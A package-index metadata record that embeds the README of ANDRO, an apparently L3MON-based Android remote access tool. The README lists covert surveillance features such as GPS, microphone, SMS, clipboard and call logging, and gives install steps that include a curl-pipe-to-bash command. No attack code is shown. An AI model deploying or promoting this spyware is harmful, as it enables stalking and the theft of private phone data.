{"id":18430423,"url":"https://github.com/aryanvbw/andro","last_synced_at":"2026-03-14T19:36:36.331Z","repository":{"id":153849224,"uuid":"545007990","full_name":"AryanVBW/ANDRO","owner":"AryanVBW","description":"ANDRO Unleash Mobile Security with our Android Exploitation and Analysis Tool. Identify vulnerabilities, reverse engineer apps, and fortify defenses with ease. Stay ahead of threats and redefine mobile protection today!","archived":false,"fork":false,"pushed_at":"2025-04-06T10:20:20.000Z","size":166295,"stargazers_count":47,"open_issues_count":12,"forks_count":11,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-14T23:54:25.956Z","etag":null,"topics":["andro","android","android-haking","android-rat","androidhaking","androidrat","aryan","aryan-technologies","aryanvbw","hack","hacking","hacktoberfest","l3mon","l3monrat","rat","termux-hacking","vivek","vivek-w"],"latest_commit_sha":null,"homepage":"https://aryanvbw.github.io/ANDRO/","language":"Smali","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/AryanVBW.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-10-03T16:13:20.000Z","updated_at":"2025-04-14T00:47:25.000Z","dependencies_parsed_at":"2024-12-24T21:09:04.925Z","dependency_job_id":"f9f880d1-9b43-4639-98e8-d2696b157473","html_url":"https://github.com/AryanVBW/ANDRO","commit_stats":null,"previous_names":[],"tags_count":13,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AryanVBW%2FANDRO","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AryanVBW%2FANDRO/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AryanVBW%2FANDRO/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AryanVBW%2FANDRO/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/AryanVBW","download_url":"https://codeload.github.com/AryanVBW/ANDRO/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248981261,"owners_count":21193144,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["andro","android","android-haking","android-rat","androidhaking","androidrat","aryan","aryan-technologies","aryanvbw","hack","hacking","hacktoberfest","l3mon","l3monrat","rat","termux-hacking","vivek","vivek-w"],"created_at":"2024-11-06T05:20:44.197Z","updated_at":"2026-03-14T19:36:36.322Z","avatar_url":"https://github.com/AryanVBW.png","language":"Smali","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/A1/andro__5_-removebg-preview.png\" height=\"100\"\u003e\u003cbr\u003e\nA cloud based remote android managment suite, powered by Nodejs \u003cimg src=\"https://raw.githubusercontent.com/AryanVBW/ANDRO/main/nodejs%20(1).png\" height=\"10\"\u003e\n\u003c/p\u003e\n\n\u003e**Disclaimer** : This software or tool is meant for educational purposes only. we are not responsible for any malicious use of the app.\n\n\n\n## Features\n- GPS Logging📍\n- Microphone Recording\n- View Contacts\n- SMS Logs\n- Send SMS\n- Call Logs📞\n- View Installed Apps\n- View Stub Permissions\n- Live Clipboard Logging\n- Live Notification Logging\n- View WiFi Networks (logs previously seen)\n- File Explorer \u0026 Downloader\n- Command Queuing\n- Built In APK Builder\n\n\n## Prerequisites \n - Java Runtime Environment 8\u003cimg src=\"https://raw.githubusercontent.com/AryanVBW/ANDRO/main/java.png\" height=\"30\"\u003e\n    - See [installation](#Installation) for OS specifics\n - NodeJs \n - Any Linux distribution like:Kali,Arch  or [Android with LinuxDroid](https://github.com/AryanVBW/LinuxDroid) \n## 1click Installation (Recommended)\n   Experience effortless installation with a single command. Simply copy and paste the following line into your terminal to automatically install all dependencies and have your ANDRO application up and running seamlessly\n   \n```bash\n   curl -sSL https://github.com/AryanVBW/ANDRO/releases/download/1click/ANDRO1click.sh | bash\n```\n### 🚀 Quick Install \n\nInstall globally using npm:\n\n```bash\nnpm install -g andro-remote-suite\n```\n\nOr using npx (no installation required):\n\n```bash\nnpx andro-remote-suite\n```\n\n### 📦 Local Installation\n \n```bash\n wget https://github.com/AryanVBW/ANDRO/releases/download/1click/ANDRO1click.sh \n chmod +x ANDRO1click.sh \n sudo ./ANDRO1click.sh \n```\n## Installation \n1. Install JRE 8 (We cannot stress this enough USE java 1.8.0 ANY issues that dont use this will be closed WITHOUT a response)\n    - Debian, Ubuntu, Etc\n        - `sudo apt-get install openjdk-8-jre`\n    - Fedora, Oracle, Red Hat, etc\n        -  `su -c \"yum install java-1.8.0-openjdk\"`\n    - Windows \n        - click [HERE](https://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html) for downloads\n\n2. Install NodeJS [Instructions Here](https://nodejs.org/en/download/package-manager/) (If you can't figure this out, you shouldn't really be using this)\n\n3. install PM2 \n    - `npm install pm2 -g`\n\n4. Download and Extract the latest release from [HERE](https://github.com/AryanVBW/ANDRO/releases/download/v.1.0/ANDRO.zip)\n\n5. In the extracted folder, run these commands\n    - `npm install` \u003c- install dependencies\n    - `pm2 start index.js` \u003c-- start the script\n    - `pm2 startup` \u003c- to run ANDRO on startup\n\n6. Set a Username \u0026 Password\n    1. Stop ANDRO `pm2 stop index`\n    2. Open `maindb.json` in a text editor\n    3. under `admin` \n        - set the `username` as plain text {Default is andro}\n        - set the `password` as a LOWERCASE MD5 hash {default pass is admin}\n    4. save the file\n    5. run `pm2 restart all`\n\n7. in your browser navigate to `http://\u003cSERVER IP\u003e:8080`\n8. `http://localhost:8080`\n    \nIt's recommended to run ANDRO behind a reverse proxy such as [NGINX](https://www.nginx.com/resources/wiki/start/topics/tutorials/install/)\n\n## Contributor\n   - J\n## Demo Login page \u0026 Control Panel\n\n\n\n\n\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/login.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/APK-Builder.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/Control-Panel.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/Device-Management.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/Logs.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/callhistory.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\n\n\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/Files-Directories.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/contact.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/downlaods.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\n\n\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/clipbord.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/recoding.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/permission.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\u003ca href=\"https://github.com/AryanVBW/ANDRO\"\u003e\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/v.2.0_logo/gps.png\" alt=\"Darkside\"\u003e\u003c/a\u003e\n\u003cimg src=\"https://github.com/AryanVBW/ANDRO/releases/download/p1/controlpanel.gif\"\u003e\n\n\u003cp align=\"center\"\u003e \n  Visitor count\u003cbr\u003e\n  \u003cimg src=\"https://profile-counter.glitch.me/Aryanvbw/count.svg\" /\u003e\n\u003c/p\u003e\n\n## Notes\nWhen opening an issue, you **MUST** use the provided templates. Issues without this will not recieve support quickly and will be put to the bottom of the figurative pile.\n\nPlease have a look through the current issues, open and closed to see if your issue has been addressed before. If it's java related, it's most definitely been addressed - In short Use Java 1.8.0\n## Thanks\nANDRO Builds off and utilizes serveral opensource softwares, Without these, ANDRO Wouldn't be what it is!\n - [express](https://github.com/expressjs/express)\n - [node-geoip](https://github.com/bluesmoon/node-geoip)\n - [lowdb](https://github.com/typicode/lowdb)\n - [socket.io](https://github.com/socketio/socket.io)\n - [Open Street Map](https://www.openstreetmap.org)\n - [Leaflet](https://leafletjs.com/)\n - L3MON by D3LV \n \n## Disclaimer\n\u003cb\u003eVivek W Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool.\u003cbr\u003e\nANDRO is built for both Educational and Internal use ONLY.\u003c/b\u003e\n\n\u003cbr\u003e\n\u003cp align=\"center\"\u003eMade 🕸️ By \u003ca href=\"https://aryanvbw.github.io/\"\u003e*Vivek W*\u003c/a\u003e\u003c/p\u003e\n\u003cp align=\"center\" style=\"font-size: 8px\"\u003ev1.0\u003c/p\u003e\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faryanvbw%2Fandro","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Faryanvbw%2Fandro","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faryanvbw%2Fandro/lists"}